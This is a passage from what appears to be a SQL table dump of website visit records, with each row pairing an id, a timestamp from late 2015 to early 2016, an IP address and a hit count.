17:34:02','188.143.232.43',1),(2525,1,'2015-12-10 19:20:11','178.137.165.96',1),(2526,1,'2015-12-10 19:20:11','178.137.165.96',1),(2527,1,'2015-12-10 19:20:11','178.137.165.96',1),(2528,1,'2015-12-10 19:20:11','178.137.165.96',1),(2529,1,'2015-12-10 19:20:11','178.137.165.96',1),(2530,1,'2015-12-10 19:20:11','178.137.165.96',1),(2531,1,'2015-12-11 00:39:17','46.118.226.141',3),(2532,1,'2015-12-11 01:12:29','24.31.213.114',1),(2533,1,'2015-12-11 02:37:13','178.137.165.96',6),(2534,1,'2015-12-11 03:53:36','73.213.146.143',1),(2535,1,'2015-12-11 05:06:16','134.249.52.203',7),(2536,1,'2015-12-11 05:06:16','134.249.52.203',1),(2537,1,'2015-12-11 05:06:16','134.249.52.203',1),(2538,1,'2015-12-11 11:42:56','134.249.52.203',2),(2539,1,'2015-12-11 12:16:05','69.58.178.57',3),(2540,1,'2015-12-11 13:47:47','167.102.191.10',1),(2541,1,'2015-12-11 15:02:06','46.118.153.165',6),(2542,1,'2015-12-11 16:11:22','167.102.191.10',1),(2543,1,'2015-12-11 21:38:18','46.118.153.165',2),(2544,1,'2015-12-12 03:42:15','78.46.174.55',2),(2545,1,'2015-12-12 08:58:37','178.137.165.96',4),(2546,1,'2015-12-12 08:58:37','178.137.165.96',1),(2547,1,'2015-12-12 08:58:37','178.137.165.96',1),(2548,1,'2015-12-12 09:08:13','46.118.153.165',3),(2549,1,'2015-12-12 10:52:14','46.118.226.141',3),(2550,1,'2015-12-12 12:22:23','70.192.198.43',2),(2551,1,'2015-12-12 14:02:36','195.154.146.225',2),(2552,1,'2015-12-12 15:25:56','68.180.231.60',1),(2553,1,'2015-12-12 16:09:54','178.137.165.96',6),(2554,1,'2015-12-12 17:53:09','207.46.13.68',2),(2555,1,'2015-12-12 20:08:04','134.249.52.203',6),(2556,1,'2015-12-13 02:41:31','134.249.52.203',3),(2557,1,'2015-12-13 06:00:23','66.249.75.151',1),(2558,1,'2015-12-13 08:56:28','46.118.153.165',3),(2559,1,'2015-12-13 08:56:28','46.118.153.165',1),(2560,1,'2015-12-13 08:56:28','46.118.153.165',1),(2561,1,'2015-12-13 08:56:28','46.118.153.165',1),(2562,1,'2015-12-13 12:06:55','185.53.44.131',1),(2563,1,'2015-12-13 14:51:37','185.53.44.85',1),(2564,1,'2015-12-13 15:51:04','46.118.153.165',2),(2565,1,'2015-12-13 20:10:22','134.249.52.203',3),(2566,1,'2015-12-13 21:56:03','46.118.226.141',3),(2567,1,'2015-12-13 22:32:33','178.137.165.96',6),(2568,1,'2015-12-14 00:53:34','157.55.39.168',1),(2569,1,'2015-12-14 02:18:04','123.125.71.87',4),(2570,1,'2015-12-14 05:28:07','178.137.165.96',6),(2571,1,'2015-12-14 09:10:23','207.46.13.22',1),(2572,1,'2015-12-14 11:44:22','134.249.52.203',6),(2573,1,'2015-12-14 15:05:54','207.46.13.22',1),(2574,1,'2015-12-14 16:09:56','188.165.234.68',2),(2575,1,'2015-12-14 17:14:11','54.213.124.187',1),(2576,1,'2015-12-14 20:51:53','85.93.89.74',2),(2577,1,'2015-12-14 21:31:04','150.148.14.8',2),(2578,1,'2015-12-15 01:55:41','134.249.52.203',2),(2579,1,'2015-12-15 01:55:41','134.249.52.203',1),(2580,1,'2015-12-15 05:06:01','46.118.153.165',6),(2581,1,'2015-12-15 11:26:04','46.118.226.141',3),(2582,1,'2015-12-15 14:41:00','134.249.52.203',1),(2583,1,'2015-12-15 14:41:00','134.249.52.203',1),(2584,1,'2015-12-15 14:41:00','134.249.52.203',1),(2585,1,'2015-12-15 15:41:03','178.137.165.96',9),(2586,1,'2015-12-15 19:52:24','66.249.75.151',1),(2587,1,'2015-12-15 22:30:13','178.137.165.96',6),(2588,1,'2015-12-16 05:56:45','134.249.52.203',6),(2589,1,'2015-12-16 06:48:42','46.118.153.165',3),(2590,1,'2015-12-16 08:08:22','78.158.11.226',1),(2591,1,'2015-12-16 09:46:30','207.46.13.22',2),(2592,1,'2015-12-16 15:09:52','178.137.160.2',1),(2593,1,'2015-12-16 15:09:52','178.137.160.2',1),(2594,1,'2015-12-16 18:29:18','46.118.226.141',4),(2595,1,'2015-12-16 22:02:25','178.137.160.2',3),(2596,1,'2015-12-17 03:14:17','134.249.52.203',2),(2597,1,'2015-12-17 03:14:17','134.249.52.203',1),(2598,1,'2015-12-17 05:38:46','46.118.226.141',3),(2599,1,'2015-12-17 06:13:40','134.249.52.203',3),(2600,1,'2015-12-17 07:05:48','46.118.153.165',5),(2601,1,'2015-12-17 07:05:48','46.118.153.165',1),(2602,1,'2015-12-17 15:28:53','46.118.153.165',3),(2603,1,'2015-12-17 17:31:11','180.76.15.16',1),(2604,1,'2015-12-17 18:29:17','178.137.160.2',6),(2605,1,'2015-12-17 22:09:48','134.249.52.203',4),(2606,1,'2015-12-17 22:09:48','134.249.52.203',1),(2607,1,'2015-12-17 22:09:48','134.249.52.203',1),(2608,1,'2015-12-18 02:20:30','178.137.160.2',3),(2609,1,'2015-12-18 03:23:15','46.118.153.165',3),(2610,1,'2015-12-18 10:19:00','178.137.160.2',2),(2611,1,'2015-12-18 22:05:29','134.249.52.203',2),(2612,1,'2015-12-19 00:22:12','46.118.153.165',5),(2613,1,'2015-12-19 01:59:46','134.249.52.203',3),(2614,1,'2015-12-19 07:31:51','178.137.160.2',4),(2615,1,'2015-12-19 07:31:51','178.137.160.2',1),(2616,1,'2015-12-19 07:31:51','178.137.160.2',1),(2617,1,'2015-12-19 08:20:04','46.118.226.141',3),(2618,1,'2015-12-19 08:20:04','46.118.226.141',1),(2619,1,'2015-12-19 13:31:53','134.249.52.203',5),(2620,1,'2015-12-19 13:31:53','134.249.52.203',1),(2621,1,'2015-12-19 14:56:14','46.118.153.165',1),(2622,1,'2015-12-19 14:56:14','46.118.153.165',1),(2623,1,'2015-12-19 16:19:04','178.137.160.2',3),(2624,1,'2015-12-19 20:23:22','46.118.153.165',2),(2625,1,'2015-12-19 20:23:22','46.118.153.165',1),(2626,1,'2015-12-20 00:04:52','178.137.160.2',5),(2627,1,'2015-12-20 01:37:59','136.243.61.196',1),(2628,1,'2015-12-20 09:17:40','68.180.231.60',1),(2629,1,'2015-12-20 12:59:36','40.77.167.52',1),(2630,1,'2015-12-20 13:04:35','40.77.167.52',4),(2631,1,'2015-12-20 18:19:27','46.118.153.165',9),(2632,1,'2015-12-20 20:56:44','178.137.160.2',8),(2633,1,'2015-12-20 21:36:33','66.249.75.151',1),(2634,1,'2015-12-21 00:50:53','134.249.52.203',3),(2635,1,'2015-12-21 05:40:50','134.249.52.203',2),(2636,1,'2015-12-21 05:40:50','134.249.52.203',1),(2637,1,'2015-12-21 06:16:56','178.137.160.2',2),(2638,1,'2015-12-21 06:16:56','178.137.160.2',1),(2639,1,'2015-12-21 09:14:13','46.118.153.165',1),(2640,1,'2015-12-21 09:14:13','46.118.153.165',1),(2641,1,'2015-12-21 09:14:13','46.118.153.165',1),(2642,1,'2015-12-21 15:04:34','46.118.153.165',3),(2643,1,'2015-12-21 21:46:04','134.249.52.203',2),(2644,1,'2015-12-21 21:46:04','134.249.52.203',1),(2645,1,'2015-12-22 01:28:33','68.180.231.60',1),(2646,1,'2015-12-22 02:28:37','46.118.153.165',3),(2647,1,'2015-12-22 05:20:16','134.249.52.203',5),(2648,1,'2015-12-22 05:20:16','134.249.52.203',1),(2649,1,'2015-12-22 10:51:40','178.137.160.2',1),(2650,1,'2015-12-22 10:51:40','178.137.160.2',1),(2651,1,'2015-12-22 10:51:40','178.137.160.2',1),(2652,1,'2015-12-22 10:51:40','178.137.160.2',1),(2653,1,'2015-12-22 10:51:40','178.137.160.2',1),(2654,1,'2015-12-22 10:51:40','178.137.160.2',1),(2655,1,'2015-12-22 12:32:23','46.118.153.165',4),(2656,1,'2015-12-22 12:32:23','46.118.153.165',1),(2657,1,'2015-12-22 12:32:23','46.118.153.165',1),(2658,1,'2015-12-22 18:48:16','205.222.248.62',1),(2659,1,'2015-12-22 20:17:35','178.137.160.2',3),(2660,1,'2015-12-22 21:47:04','73.129.151.123',3),(2661,1,'2015-12-22 23:42:25','134.249.52.203',3),(2662,1,'2015-12-23 02:35:29','68.134.34.95',1),(2663,1,'2015-12-23 05:23:29','178.137.160.2',3),(2664,1,'2015-12-23 10:04:41','46.118.153.165',2),(2665,1,'2015-12-23 10:04:41','46.118.153.165',1),(2666,1,'2015-12-23 12:03:02','134.249.52.203',2),(2667,1,'2015-12-23 12:03:02','134.249.52.203',1),(2668,1,'2015-12-23 20:55:07','134.249.52.203',3),(2669,1,'2015-12-23 21:12:21','46.118.226.141',6),(2670,1,'2015-12-24 00:59:43','178.137.160.2',1),(2671,1,'2015-12-24 00:59:43','178.137.160.2',1),(2672,1,'2015-12-24 00:59:43','178.137.160.2',1),(2673,1,'2015-12-24 00:59:43','178.137.160.2',1),(2674,1,'2015-12-24 00:59:43','178.137.160.2',1),(2675,1,'2015-12-24 00:59:43','178.137.160.2',1),(2676,1,'2015-12-24 07:23:05','46.118.153.165',1),(2677,1,'2015-12-24 07:23:05','46.118.153.165',1),(2678,1,'2015-12-24 07:23:05','46.118.153.165',1),(2679,1,'2015-12-24 07:23:05','46.118.153.165',1),(2680,1,'2015-12-24 07:23:05','46.118.153.165',1),(2681,1,'2015-12-24 11:09:14','178.137.160.2',2),(2682,1,'2015-12-24 11:09:14','178.137.160.2',1),(2683,1,'2015-12-24 19:46:26','178.137.160.2',2),(2684,1,'2015-12-24 23:22:19','220.181.108.83',4),(2685,1,'2015-12-25 01:40:23','71.163.134.28',1),(2686,1,'2015-12-25 03:49:57','134.249.52.203',2),(2687,1,'2015-12-25 03:49:57','134.249.52.203',1),(2688,1,'2015-12-25 04:01:46','134.249.52.203',3),(2689,1,'2015-12-25 05:06:15','46.118.153.165',5),(2690,1,'2015-12-25 07:35:38','46.118.226.141',3),(2691,1,'2015-12-25 12:22:13','134.249.52.203',3),(2692,1,'2015-12-25 13:26:29','178.137.160.2',3),(2693,1,'2015-12-25 15:56:22','46.118.153.165',3),(2694,1,'2015-12-25 22:26:28','178.137.160.2',4),(2695,1,'2015-12-26 01:50:13','46.118.153.165',6),(2696,1,'2015-12-26 03:42:23','46.118.226.141',3),(2697,1,'2015-12-26 07:34:11','178.137.160.2',3),(2698,1,'2015-12-26 12:18:55','134.249.52.203',2),(2699,1,'2015-12-26 12:18:55','134.249.52.203',1),(2700,1,'2015-12-26 13:47:14','46.118.226.141',1),(2701,1,'2015-12-26 13:47:14','46.118.226.141',1),(2702,1,'2015-12-26 13:47:14','46.118.226.141',1),(2703,1,'2015-12-26 17:04:39','157.55.39.199',1),(2704,1,'2015-12-26 18:02:30','178.137.160.2',2),(2705,1,'2015-12-26 18:02:30','178.137.160.2',1),(2706,1,'2015-12-26 20:26:36','134.249.52.203',4),(2707,1,'2015-12-26 23:54:55','134.249.52.203',2),(2708,1,'2015-12-26 23:54:55','134.249.52.203',1),(2709,1,'2015-12-27 00:19:38','46.118.153.165',2),(2710,1,'2015-12-27 02:44:39','178.137.160.2',1),(2711,1,'2015-12-27 03:31:17','108.56.68.79',2),(2712,1,'2015-12-27 05:22:18','134.249.52.203',3),(2713,1,'2015-12-27 07:18:13','46.118.153.165',1),(2714,1,'2015-12-27 07:18:13','46.118.153.165',1),(2715,1,'2015-12-27 07:18:13','46.118.153.165',1),(2716,1,'2015-12-27 11:11:47','46.118.153.165',2),(2717,1,'2015-12-27 11:11:47','46.118.153.165',1),(2718,1,'2015-12-27 12:00:51','178.137.160.2',5),(2719,1,'2015-12-27 20:26:58','46.118.153.165',5),(2720,1,'2015-12-27 20:26:58','46.118.153.165',1),(2721,1,'2015-12-27 22:14:41','207.46.13.6',4),(2722,1,'2015-12-28 09:19:50','178.137.88.17',3),(2723,1,'2015-12-28 14:41:51','188.165.233.34',2),(2724,1,'2015-12-28 17:32:15','178.137.89.157',6),(2725,1,'2015-12-28 19:39:43','68.180.231.60',1),(2726,1,'2015-12-28 22:38:14','178.137.89.157',2),(2727,1,'2015-12-28 23:51:15','178.137.89.157',3),(2728,1,'2015-12-29 00:09:46','178.137.89.157',2),(2729,1,'2015-12-29 01:10:15','178.137.88.17',8),(2730,1,'2015-12-29 01:10:15','178.137.88.17',1),(2731,1,'2015-12-29 03:28:43','178.137.160.2',6),(2732,1,'2015-12-29 04:11:45','178.137.160.2',9),(2733,1,'2015-12-29 05:24:59','46.118.226.141',2),(2734,1,'2015-12-29 05:24:59','46.118.226.141',1),(2735,1,'2015-12-29 16:47:25','207.46.13.167',2),(2736,1,'2015-12-29 20:33:26','5.189.176.80',2),(2737,1,'2015-12-29 21:00:26','69.162.157.83',2),(2738,1,'2015-12-30 03:41:26','178.137.88.17',3),(2739,1,'2015-12-30 21:47:38','178.137.160.2',3),(2740,1,'2015-12-31 04:19:28','40.77.167.79',1),(2741,1,'2016-01-01 15:48:33','136.243.48.84',1),(2742,1,'2016-01-01 16:00:08','178.137.160.2',3),(2743,1,'2016-01-01 19:03:25','144.76.224.111',2),(2744,1,'2016-01-01 20:12:31','207.46.13.71',1),(2745,1,'2016-01-02 03:48:49','172.74.70.244',1),(2746,1,'2016-01-02 10:49:03','46.118.226.141',1),(2747,1,'2016-01-02 10:49:03','46.118.226.141',1),(2748,1,'2016-01-02 10:49:03','46.118.226.141',1),(2749,1,'2016-01-02 11:31:44','178.137.89.157',3),(2750,1,'2016-01-02 12:32:36','207.46.13.176',1),(2751,1,'2016-01-03 09:53:27','178.137.160.2',3),(2752,1,'2016-01-03 14:14:46','66.249.75.142',1),(2753,1,'2016-01-03 23:51:49','195.154.226.90',3),(2754,1,'2016-01-04 04:11:50','213.239.211.141',2),(2755,1,'2016-01-04 13:31:19','188.116.36.80',1),(2756,1,'2016-01-04 17:43:41','178.137.89.157',3),(2757,1,'2016-01-04 22:37:15','128.177.161.144',1),(2758,1,'2016-01-05 00:40:23','100.15.158.58',1),(2759,1,'2016-01-05 02:19:49','67.86.98.147',2),(2760,1,'2016-01-05 03:33:59','178.137.160.2',2),(2761,1,'2016-01-05 03:33:59','178.137.160.2',1),(2762,1,'2016-01-05 05:04:55','191.101.67.135',1),(2763,1,'2016-01-05 12:03:06','188.116.36.219',1),(2764,1,'2016-01-05 13:09:41','46.118.126.200',1),(2765,1,'2016-01-05 18:01:51','191.101.67.192',1),(2766,1,'2016-01-06 01:09:44','157.55.39.242',2),(2767,1,'2016-01-06 22:15:41','178.137.160.2',2),(2768,1,'2016-01-06 22:15:41','178.137.160.2',1),(2769,1,'2016-01-07 02:54:03','207.46.13.96',1),(2770,1,'2016-01-07 07:36:49','46.118.126.200',3),(2771,1,'2016-01-07 11:16:03','193.189.117.121',1),(2772,1,'2016-01-08 00:07:24','207.46.13.182',1),(2773,1,'2016-01-08 06:33:49','188.42.240.119',2),(2774,1,'2016-01-08 07:18:30','178.137.89.157',2),(2775,1,'2016-01-08 07:18:30','178.137.89.157',1),(2776,1,'2016-01-08 09:54:37','207.46.13.94',1),(2777,1,'2016-01-08 10:35:30','195.154.226.90',2),(2778,1,'2016-01-08 17:27:17','178.137.160.2',4),(2779,1,'2016-01-09 03:54:29','46.118.126.200',3),(2780,1,'2016-01-10 07:36:59','178.137.89.157',2),(2781,1,'2016-01-10 09:37:34','188.143.232.10',1),(2782,1,'2016-01-10 12:45:08','178.137.160.2',3),(2783,1,'2016-01-10 20:51:59','66.220.158.105',3),(2784,1,'2016-01-11 10:02:15','69.58.178.58',2),(2785,1,'2016-01-12 02:11:16','66.249.79.76',1),(2786,1,'2016-01-12 05:19:48','66.249.79.52',1),(2787,1,'2016-01-12 09:51:11','104.236.59.151',2),(2788,1,'2016-01-12 14:49:34','178.137.89.157',3),(2789,1,'2016-01-12 17:17:32','167.102.133.216',1),(2790,1,'2016-01-12 19:48:31','161.80.88.240',1),(2791,1,'2016-01-13 09:33:58','207.46.13.174',2),(2792,1,'2016-01-13 18:39:41','144.183.16.2',4),(2793,1,'2016-01-13 20:25:10','180.76.15.134',1),(2794,1,'2016-01-13 23:42:21','68.180.231.60',1),(2795,1,'2016-01-14 02:02:27','38.122.3.138',1),(2796,1,'2016-01-14 15:09:19','208.87.234.201',1),(2797,1,'2016-01-14 16:06:25','188.143.232.43',1),(2798,1,'2016-01-14 17:06:02','167.102.191.10',2),(2799,1,'2016-01-14 18:42:57','188.143.232.34',1),(2800,1,'2016-01-14 21:42:13','180.76.15.33',1),(2801,1,'2016-01-15 03:34:42','77.75.76.164',1),(2802,1,'2016-01-15 04:13:46','173.73.187.58',1),(2803,1,'2016-01-15 12:50:52','136.243.48.82',3),(2804,1,'2016-01-15 16:12:59','188.143.232.43',4),(2805,1,'2016-01-15 18:51:47','159.203.75.59',1),(2806,1,'2016-01-15 19:40:49','73.128.243.223',1),(2807,1,'2016-01-16 08:25:18','195.154.226.90',2),(2808,1,'2016-01-16 15:07:07','172.58.216.252',2),(2809,1,'2016-01-17 05:02:29','157.55.39.28',1),(2810,1,'2016-01-17 14:41:32','100.36.84.219',1),(2811,1,'2016-01-17 19:32:27','207.46.13.181',2),(2812,1,'2016-01-17 23:06:45','71.178.54.26',1),(2813,1,'2016-01-18 05:33:47','207.46.13.181',1),(2814,1,'2016-01-18 12:54:26','172.56.3.145',4),(2815,1,'2016-01-18 14:17:45','180.76.15.160',1),(2816,1,'2016-01-18 15:17:45','70.192.214.171',4),(2817,1,'2016-01-19 04:55:13','66.249.79.48',1),(2818,1,'2016-01-19 05:22:35','180.76.15.22',1),(2819,1,'2016-01-19 16:16:56','52.58.10.211',1),(2820,1,'2016-01-19 23:55:24','207.46.13.184',1),(2821,1,'2016-01-20 10:43:07','77.75.76.160',1),(2822,1,'2016-01-20 17:01:38','198.211.113.156',1),(2823,1,'2016-01-21 02:42:09','98.233.71.131',2),(2824,1,'2016-01-21 06:35:36','108.220.67.58',1),(2825,1,'2016-01-21 11:41:09','217.69.133.228',1),(2826,1,'2016-01-22 00:45:34','98.233.106.206',9),(2827,1,'2016-01-22 04:03:10','193.189.117.121',1),(2828,1,'2016-01-22 08:12:16','217.69.133.227',1),(2829,1,'2016-01-22 12:36:15','188.143.232.22',1),(2830,1,'2016-01-22 19:53:19','180.76.15.6',1),(2831,1,'2016-01-22 20:26:10','40.77.167.64',2),(2832,1,'2016-01-23 01:08:19','180.76.15.31',1),(2833,1,'2016-01-23 08:35:57','78.46.174.55',2),(2834,1,'2016-01-24 04:51:21','23.81.247.47',1),(2835,1,'2016-01-24 09:44:31','176.31.39.23',1),(2836,1,'2016-01-24 13:33:16','72.76.243.86',4),(2837,1,'2016-01-24 15:10:50','188.42.240.119',2),(2838,1,'2016-01-24 20:42:26','46.119.119.70',3),(2839,1,'2016-01-25 04:27:32','68.180.231.60',1),(2840,1,'2016-01-25 06:40:03','207.46.13.135',1),(2841,1,'2016-01-25 08:02:07','178.137.85.56',3),(2842,1,'2016-01-25 17:13:11','54.93.49.227',1),(2843,1,'2016-01-26 07:44:41','208.115.113.86',1),(2844,1,'2016-01-26 11:19:15','68.180.231.60',1),(2845,1,'2016-01-27 02:12:40','208.115.113.94',1),(2846,1,'2016-01-27 08:11:52','176.31.39.23',1),(2847,1,'2016-01-27 17:24:14','207.46.13.39',2),(2848,1,'2016-01-27 20:01:21','167.102.191.10',1),(2849,1,'2016-01-30 05:48:07','69.113.76.20',2),(2850,1,'2016-01-30 21:43:31','85.93.89.74',2),(2851,1,'2016-01-31 08:24:04','71.244.196.206',1),(2852,1,'2016-01-31 11:28:57','69.84.207.246',2),(2853,1,'2016-01-31 23:25:27','40.77.167.38',1),(2854,1,'2016-02-01 05:18:51','91.121.79.180',2),(2855,1,'2016-02-01 10:59:23','78.24.217.72',2),(2856,1,'2016-02-01 12:34:13','157.55.39.151',1),(2857,1,'2016-02-01 15:08:42','188.143.232.40',4),(2858,1,'2016-02-01 22:12:31','188.143.232.62',3),(2859,1,'2016-02-02 01:36:36','38.99.97.48',1),(2860,1,'2016-02-02 03:34:08','108.31.253.39',2),(2861,1,'2016-02-02 11:56:00','157.55.39.217',1),(2862,1,'2016-02-02 16:03:51','38.99.97.48',1),(2863,1,'2016-02-02 19:06:40','73.134.151.109',4),(2864,1,'2016-02-02 20:06:15','151.80.216.92',1),(2865,1,'2016-02-02 22:12:23','66.250.190.28',4),(2866,1,'2016-02-03 00:17:58','68.180.231.60',2),(2867,1,'2016-02-03 03:25:34','40.77.167.42',2),(2868,1,'2016-02-03 11:43:12','191.232.136.56',1),(2869,1,'2016-02-03 16:55:57','192.243.55.134',1),(2870,1,'2016-02-03 17:04:44','208.115.113.94',1),(2871,1,'2016-02-04 16:37:01','205.222.248.62',1),(2872,1,'2016-02-04 19:12:20','157.55.39.241',1),(2873,1,'2016-02-04 23:46:31','193.189.117.121',1),(2874,1,'2016-02-05 05:33:35','78.158.11.226',1),(2875,1,'2016-02-05 06:46:08','54.190.220.60',4),(2876,1,'2016-02-05 10:49:15','83.149.45.243',1),(2877,1,'2016-02-05 13:00:19','31.204.128.94',2),(2878,1,'2016-02-07 11:07:07','123.125.71.36',1),(2879,1,'2016-02-07 18:05:46','188.42.240.119',2),(2880,1,'2016-02-08 03:54:25','71.166.38.137',1),(2881,1,'2016-02-08 10:13:22','23.80.155.120',1),(2882,1,'2016-02-08 17:54:56','46.246.47.167',2),(2883,1,'2016-02-08 19:09:47','31.148.219.141',1),(2884,1,'2016-02-08 21:23:34','220.181.108.177',1),(2885,1,'2016-02-09 21:56:34','207.46.13.132',2),(2886,1,'2016-02-09 23:43:35','5.9.112.207',1),(2887,1,'2016-02-10 05:41:53','68.180.231.60',1),(2888,1,'2016-02-10 19:55:54','50.198.128.11',1),(2889,1,'2016-02-10 22:53:39','74.106.230.146',2),(2890,1,'2016-02-11 06:12:35','54.196.217.252',8),(2891,1,'2016-02-11 09:56:35','69.58.178.57',2),(2892,1,'2016-02-11 18:49:02','69.251.219.234',1),(2893,1,'2016-02-12 15:19:17','207.46.13.147',1),(2894,1,'2016-02-12 19:55:41','38.99.97.48',1),(2895,1,'2016-02-12 20:01:18','159.203.75.59',2),(2896,1,'2016-02-12 22:20:32','91.121.141.219',1),(2897,1,'2016-02-12 23:48:43','188.42.240.119',1),(2898,1,'2016-02-13 00:15:48','188.42.240.119',2),(2899,1,'2016-02-13 02:33:00','158.69.225.36',1),(2900,1,'2016-02-14 05:23:54','38.99.97.48',1),(2901,1,'2016-02-14 09:09:45','66.249.75.142',1),(2902,1,'2016-02-14 18:15:00','157.55.39.223',1),(2903,1,'2016-02-15 01:09:11','46.105.98.166',2),(2904,1,'2016-02-15 05:05:38','66.249.75.151',1),(2905,1,'2016-02-15 17:32:17','71.121.169.113',1),(2906,1,'2016-02-15 18:02:47','128.199.62.93',2),(2907,1,'2016-02-15 19:52:37','40.77.167.12',1),(2908,1,'2016-02-15 20:09:41','184.154.36.183',13),(2909,1,'2016-02-16 18:38:42','157.55.39.192',1),(2910,1,'2016-02-17 02:52:41','157.55.39.159',1),(2911,1,'2016-02-17 05:47:10','157.55.39.0',1),(2912,1,'2016-02-17 12:39:02','73.65.114.241',1),(2913,1,'2016-02-17 19:06:35','157.55.39.115',1),(2914,1,'2016-02-18 08:36:17','149.202.90.118',2),(2915,1,'2016-02-18 14:32:45','185.89.100.221',1),(2916,1,'2016-02-18 20:23:36','209.124.166.38',1),(2917,1,'2016-02-19 13:19:24','128.199.38.245',1),(2918,1,'2016-02-19 16:38:06','157.55.39.28',1),(2919,1,'2016-02-19 19:29:29','162.243.89.185',2),(2920,1,'2016-02-19 20:01:35','184.154.36.185',2),(2921,1,'2016-02-19 21:30:07','96.244.103.123',2),(2922,1,'2016-02-20 01:10:09','180.76.15.25',1),(2923,1,'2016-02-20 07:36:48','208.115.113.86',1),(2924,1,'2016-02-20 10:49:25','93.180.64.220',1),(2925,1,'2016-02-20 15:08:53','74.14.23.76',1),(2926,1,'2016-02-20 20:01:36','184.154.36.171',1),(2927,1,'2016-02-21 00:40:22','96.234.167.165',1),(2928,1,'2016-02-21 20:09:08','184.154.36.183',1),(2929,1,'2016-02-22 01:04:06','157.55.39.47',1),(2930,1,'2016-02-22 14:08:18','8.21.241.69',1),(2931,1,'2016-02-22 16:44:51','180.76.15.15',1),(2932,1,'2016-02-23 09:58:14','172.241.136.243',1),(2933,1,'2016-02-24 00:02:19','207.46.13.180',1),(2934,1,'2016-02-24 07:46:22','68.180.231.60',1),(2935,1,'2016-02-24 17:42:13','96.255.1.132',1),(2936,1,'2016-02-24 22:00:40','68.180.231.60',1),(2937,1,'2016-02-25 09:36:22','93.180.64.220',1),(2938,1,'2016-02-25 15:21:37','157.55.39.28',1),(2939,1,'2016-02-25 20:11:29','184.154.36.183',2),(2940,1,'2016-02-25 22:55:23','38.99.97.48',1),(2941,1,'2016-02-26 02:28:40','40.77.167.34',1),(2942,1,'2016-02-26 19:46:05','188.42.240.119',1),(2943,1,'2016-02-26 20:05:38','184.154.36.171',1),(2944,1,'2016-02-26 21:51:13','109.86.16.253',1),(2945,1,'2016-02-26 23:10:08','188.42.240.119',1),(2946,1,'2016-02-27 17:14:04','88.198.22.8',1),(2947,1,'2016-02-27 19:45:14','208.115.113.86',1),(2948,1,'2016-02-27 20:09:31','184.154.36.183',5),(2949,1,'2016-02-28 04:44:31','141.8.143.198',1),(2950,1,'2016-02-28 05:11:33','208.115.113.94',1),(2951,1,'2016-02-28 12:36:14','73.173.91.7',3),(2952,1,'2016-02-28 14:25:12','180.76.15.145',1),(2953,1,'2016-02-28 18:21:52','96.244.147.246',1),(2954,1,'2016-02-29 00:38:51','40.77.167.32',1),(2955,1,'2016-02-29 03:59:59','38.99.97.48',1),(2956,1,'2016-02-29 08:31:39','46.246.48.193',2),(2957,1,'2016-02-29 13:38:00','134.249.159.5',1),(2958,1,'2016-02-29 20:07:17','184.154.36.183',1),(2959,1,'2016-03-01 00:04:31','213.177.107.202',1),(2960,1,'2016-03-01 00:04:31','213.177.107.202',1),(2961,1,'2016-03-01 08:59:19','157.55.39.179',1),(2962,1,'2016-03-01 12:29:40','192.240.106.138',1),(2963,1,'2016-03-01 16:56:15','173.252.112.103',2),(2964,1,'2016-03-01 20:00:43','184.154.36.185',3),(2965,1,'2016-03-01 21:20:20','73.129.30.214',2),(2966,1,'2016-03-01 23:08:49','107.170.24.247',2),(2967,1,'2016-03-02 08:04:52','198.71.85.185',1),(2968,1,'2016-03-02 09:50:19','207.46.13.38',1),(2969,1,'2016-03-02 19:48:25','134.249.159.5',1),(2970,1,'2016-03-02 20:07:37','184.154.36.183',1),(2971,1,'2016-03-03 04:36:43','184.91.39.188',1),(2972,1,'2016-03-03 07:45:52','207.46.13.8',1),(2973,1,'2016-03-03 08:14:41','134.249.159.5',2),(2974,1,'2016-03-03 20:27:51','50.17.93.32',3),(2975,1,'2016-03-03 20:27:51','50.17.93.32',1),(2976,1,'2016-03-04 00:36:06','77.75.79.17',1),(2977,1,'2016-03-04 02:57:59','157.55.39.162',1),(2978,1,'2016-03-04 08:28:15','157.55.39.162',1),(2979,1,'2016-03-04 10:47:40','94.199.151.22',2),(2980,1,'2016-03-04 19:43:59','66.249.79.48',1),(2981,1,'2016-03-04 20:05:23','184.154.36.185',2),(2982,1,'2016-03-05 00:36:31','54.147.50.147',1),(2983,1,'2016-03-05 03:13:52','157.55.39.127',1),(2984,1,'2016-03-05 06:32:51','187.185.4.128',1),(2985,1,'2016-03-05 09:43:06','68.180.231.60',1),(2986,1,'2016-03-05 17:08:17','70.192.201.165',1),(2987,1,'2016-03-05 23:23:35','108.40.7.51',1),(2988,1,'2016-03-06 07:43:09','208.115.113.86',1),(2989,1,'2016-03-06 14:24:46','50.153.249.64',7),(2990,1,'2016-03-07 13:04:18','207.46.13.28',1),(2991,1,'2016-03-07 14:18:49','167.102.225.158',1),(2992,1,'2016-03-08 01:00:33','207.46.13.28',2),(2993,1,'2016-03-08 09:38:19','178.255.215.93',4),(2994,1,'2016-03-08 13:34:53','66.87.81.232',5),(2995,1,'2016-03-09 19:39:36','178.255.215.93',9),(2996,1,'2016-03-10 20:02:34','184.154.36.184',5),(2997,1,'2016-03-11 22:33:39','162.243.114.150',4),(2998,1,'2016-03-13 04:39:16','207.46.13.1',6),(2999,1,'2016-03-14 10:53:57','176.31.126.56',9),(3000,1,'2016-03-15 14:11:06','24.104.140.51',4),(3001,1,'2016-03-16 14:14:18','134.249.159.5',11),(3002,1,'2016-03-17 23:45:25','173.193.219.168',2),(3003,1,'2016-03-19 10:05:00','134.249.159.5',5),(3004,1,'2016-03-20 13:19:15','207.46.13.57',4),(3005,1,'2016-03-21 18:28:50','204.236.235.245',10),(3006,1,'2016-03-22 21:53:13','66.208.17.34',9),(3007,1,'2016-03-24 02:26:10','38.99.97.48',6),(3008,1,'2016-03-25 15:23:13','46.119.117.207',25),(3009,1,'2016-03-26 16:25:07','66.249.79.52',11),(3010,1,'2016-03-27 19:03:42','184.154.36.185',31),(3011,1,'2016-03-29 04:23:41','71.120.6.20',16),(3012,1,'2016-03-30 06:37:19','180.76.15.15',28),(3013,1,'2016-03-31 06:56:17','213.177.107.202',12),(3014,1,'2016-04-01 09:27:53','108.62.238.235',37),(3015,1,'2016-04-02 10:53:13','207.46.13.160',8),(3016,1,'2016-04-03 18:11:53','46.119.127.4',31),(3017,1,'2016-04-04 19:05:37','184.154.36.185',14),(3018,1,'2016-04-05 21:53:43','5.248.253.133',25),(3019,1,'2016-04-06 22:58:54','46.161.9.6',22),(3020,1,'2016-04-08 00:28:53','157.55.39.154',22),(3021,1,'2016-04-09 05:57:16','136.243.48.85',22),(3022,1,'2016-04-10 07:04:26','46.118.157.172',27),(3023,1,'2016-04-10 07:04:26','46.118.157.172',1),(3024,1,'2016-04-11 